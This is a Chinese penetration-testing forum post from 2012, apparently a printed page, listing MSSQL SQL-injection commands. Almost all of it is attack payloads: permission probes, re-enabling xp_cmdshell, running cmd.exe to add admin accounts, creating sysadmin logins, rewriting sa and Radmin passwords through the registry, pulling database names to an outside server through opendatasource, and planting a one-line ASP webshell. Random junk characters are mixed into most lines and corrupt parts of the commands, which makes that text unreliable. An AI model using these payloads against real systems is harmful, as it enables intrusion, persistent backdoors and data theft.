中国网络渗透测试联盟

标题: 阿D常用的一些注入命令 [打印本页]

作者: admin    时间: 2012-9-13 17:26
标题: 阿D常用的一些注入命令
阿D常用的一些注入命令
: R+ q4 a( j% c7 _+ R& t//看看是什么权限的# `8 J' Q9 U1 w- r: j7 T
and 1=(Select IS_MEMBER('db_owner'))
: w8 v2 F9 y* _; D3 H1 Q' qAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--% l2 T$ Y, H* N: r$ G5 q

; c2 z- e4 F0 Z; \//检测是否有读取某数据库的权限
6 S2 N9 [- G) T+ M. Pand 1= (Select HAS_DBACCESS('master'))
$ N3 B0 h4 C, C& h( j; o! FAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
' V- e' N4 _  |" A4 s4 c1 ?" ]' v5 R! q0 i# w% y
5 C( m: |; b4 _0 \
数字类型
5 y* T4 ]  |  ^* t) y0 Cand char(124)%2Buser%2Bchar(124)=0
) M* A# r( r4 k! d! g3 j+ P1 }9 t) T! \7 w: l7 |: Z4 }. h
字符类型
, _! C: h. D/ P4 n9 |5 a' and char(124)%2Buser%2Bchar(124)=0 and ''='
. N5 P( N3 H' T) m$ P' r6 Y
$ b% l' `0 P2 D; A搜索类型
) F, t7 o& Y. }/ E9 v8 Z, T' and char(124)%2Buser%2Bchar(124)=0 and '%'='/ I+ `# U! f) J0 b/ G
  z3 {7 H& ?) ?! o- w4 Q9 F
爆用户名
* ~$ x7 Z5 t/ G& o) Nand user>0
* E+ @6 [- J, \7 Q' and user>0 and ''='7 ~8 I$ }4 I. c$ H7 i; M9 o
" @6 g9 n# e0 S8 ]- Z( v6 @2 N* s
检测是否为SA权限
+ Q) _' O& u. n! l0 rand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
: [6 m+ S/ `4 HAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
3 S% l* O& H0 r; M2 X/ c/ r5 O0 T( X9 _: v! S+ W
检测是不是MSSQL数据库
: u1 a5 ~- u; J" dand exists (select * from sysobjects);-- 0 x7 O3 I+ Y9 |2 x% P" J
  R( g6 C; g( r% K( R( n( c
检测是否支持多行
* I5 I/ d: {9 H" E8 y2 d;declare @d int;--
) ?  C! t9 y1 B5 c- e
* @4 x- i# t8 H恢复 xp_cmdshell
' L! c9 k+ m; c;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
2 H0 o9 m% S2 }  o; N  J- `, u5 v( T$ C! A
! W5 k+ k. L) P! ?& e
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
7 A) k# Q8 @. L& N: D, q3 i* @( ]' D+ L2 O, S
//-----------------------
: l- F7 G" _' V- \: M//      执行命令: \$ S- m3 _$ _' H
//-----------------------
; p  `' ^8 T; u" P首先开启沙盘模式:! Y7 X# W8 T5 m6 h! o$ E, k
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
+ c9 `  C; v, @. }+ A; @! F  S
+ d* J1 o0 p" S# G7 A然后利用jet.oledb执行系统命令5 X  N/ c% M# H
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')4 F/ Y0 ^! S* x
3 r7 i/ ^- Z* z, b  D& F+ ?
执行命令
( o3 I- S2 F  E, O% \;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--! ]% {1 w2 J/ {; |

3 f/ b  N7 U  X) SEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
) t5 ~& p0 o; N% r' p; v6 [) m
% I$ S# j) W4 R$ q6 y' H) {* i判断xp_cmdshell扩展存储过程是否存在:
' I* S; m( d" W: Ohttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')4 r* r6 ]" J* P5 F- {6 I8 N, z

  ~" `% H) F* a写注册表
. L; @7 J7 W& H& h+ dexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1, b7 @9 I" R6 s9 f
) m& |3 o! S3 U3 O! E
REG_SZ
: W" s% K/ [+ d- {3 c
* @/ I3 ?% \7 ]5 m# A读注册表8 X( e2 l* O% O% N2 E' `$ P4 m$ E& X; b
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
2 H# T$ y# R# ]% \$ D
( r6 D/ O6 D# U4 u& b读取目录内容, H/ o% _% g. ~
exec master..xp_dirtree 'c:\winnt\system32\',1,1
$ k! W  V% t# E+ V6 I5 B' F( H
0 |; {" q0 M6 ~& w. L: j+ I% B4 T( o9 E% X+ U" ?6 w) N
数据库备份
: B2 f  G' E5 g) d! Xbackup database pubs to disk = 'c:\123.bak'& G. T/ z- I8 N3 u
% E/ z4 k  B" ^- E/ _' ]0 R' J
//爆出长度
+ }4 f1 A0 p* M6 Q+ l1 c9 N: yAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
$ {3 T: u# y; I& s0 X9 _, d
/ w1 Y& n6 F8 a9 E
$ m1 Y9 D/ l/ o5 I3 v4 W' ^  y% j0 L; L; F- x6 |
更改sa口令方法:用sql综合利用工具连接后,执行命令:% j; |  G. N3 o8 u% Y3 P" E8 F0 x
exec sp_password NULL,'新密码','sa'  f/ X) `' s- l5 F( E
) A  P2 [' v9 }. `+ ~- ]
添加和删除一个SA权限的用户test:( S) `& ?# S+ `2 y# k3 A; e
exec master.dbo.sp_addlogin test,ptlove
* N! \$ k3 K. d: a" @7 K$ `exec master.dbo.sp_addsrvrolemember test,sysadmin# t& Z4 u# X5 q. U" E$ Y. q1 t2 Y) U! {
1 x" b/ v3 g' }4 J0 j' z! W, X
删除扩展存储过过程xp_cmdshell的语句: 0 J4 l. Y5 _' |2 n0 R
exec sp_dropextendedproc 'xp_cmdshell'0 q; P3 N. l3 \5 o; Q3 k; @" f+ Z

$ S3 G, @& N$ B/ X添加扩展存储过过程
0 W+ E# l; y! r/ ~5 sEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' 5 ]" A* g2 y) d$ w* p' j3 F
GRANT exec On xp_proxiedadata TO public . ^* E( o7 P2 D4 D  R2 g+ f) }+ g
9 c/ g9 X$ e" ~  m
! t( s) H- B+ i" _5 [
停掉或激活某个服务。
# O3 G0 `. J/ C, _! \8 K
* u; x5 I9 H9 Z* X, Yexec master..xp_servicecontrol 'stop','schedule'" \5 T+ a: `5 k9 o
exec master..xp_servicecontrol 'start','schedule'
& z4 H9 k  \' `( v4 {. ]
0 |6 B# O3 Y9 b! u. ^+ f3 f* fdbo.xp_subdirs
0 a/ j" a# H/ K: H
6 x1 r+ K- ~) }4 ^只列某个目录下的子目录。
, x# P/ L: {# @: x  c; n9 y2 exp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
8 V: t' P+ ?* \
! J& ^* q/ R( z0 Cdbo.xp_makecab
0 [' p& n0 T9 @
3 K( \/ g% _6 C. k3 N# i将目标多个档案压缩到某个目标档案之内。
/ G9 `! e, Z- n9 o所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
% D0 h, Q" R& a0 e, @
6 c1 H6 x0 w$ M; @9 v$ ~( Pdbo.xp_makecab  `0 F; L* ~9 H, E& w
'c:\test.cab','mszip',1,
* l* R& [% e1 J! j0 u6 n'C:\Inetpub\wwwroot\SQLInject\login.asp',
7 R( a2 ^% N) a'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
" p  o  ^# [4 A
2 O& }& `3 Q2 F, X+ C# ]  g' {xp_terminate_process
) x* x0 Q% b. V* j4 w# [, y4 ^! e3 ^% E5 ^
停掉某个执行中的程序,但赋予的参数是 Process ID。! a$ S/ `# k& L; Z
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID+ P/ u0 W, U0 t% e' U. Z) ~0 h) ^
2 a# |3 V/ r/ j7 _5 }
xp_terminate_process 2484: t9 ^' R8 Y2 {  P+ R9 _# y% m

1 K% O& l% ]1 P: F  txp_unpackcab
& I8 _7 A  q# x3 u) V5 o. Y8 c- [) S) Z4 m1 d
解开压缩档。
4 g! j" Z$ U& E2 j- c) i+ k3 a% j7 I
xp_unpackcab 'c:\test.cab','c:\temp',1( a' Z+ F5 j% N- ^2 Q

! u  M0 c- f% H# B
) Z. ^9 M0 P+ k# m某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
+ i, u0 x' U, p. I! N
7 i; n2 N3 h  G, F0 e- W0 Wcreate database lcx;
) v3 ^: ~5 ^( T5 H/ x3 {Create TABLE ku(name nvarchar(256) null);* T) q8 i$ y- a: `1 z7 e7 i
Create TABLE biao(id int NULL,name nvarchar(256) null);
" s- A4 `4 r0 Y$ `7 y' N* |. A1 @) v' u
//得到数据库名) \0 b4 y( w" \6 Y( ^, ?
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
. l/ x' g" U7 K( ?, R# o- i9 u7 x* B7 A- ~! o0 J3 L

$ X% ]+ x% @- R, Z& _9 |//在Master中创建表,看看权限怎样, e& Z3 D& ^$ I" L7 e/ z2 l
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
: S) A/ B( p. [( d9 p$ R9 ~" d5 s' x+ G
用 sp_makewebtask直接在web目录里写入一句话马:
0 F& X1 @( }! s+ |http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--. F7 y+ G5 b* @- z) T

# O6 p" D8 J% G1 C) {9 d( l+ |//更新表内容
6 L% [+ ~& y0 H+ D9 s+ w  mUpdate films SET kind = 'Dramatic' Where id = 123
! }7 m5 d) b3 x) r/ t2 x8 O) k0 U8 b( k8 u
' r3 n, g! p) ~4 ^" e+ Z( Q//删除内容
% L7 A) M2 U7 i* P+ \delete from table_name where Stockid = 3




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2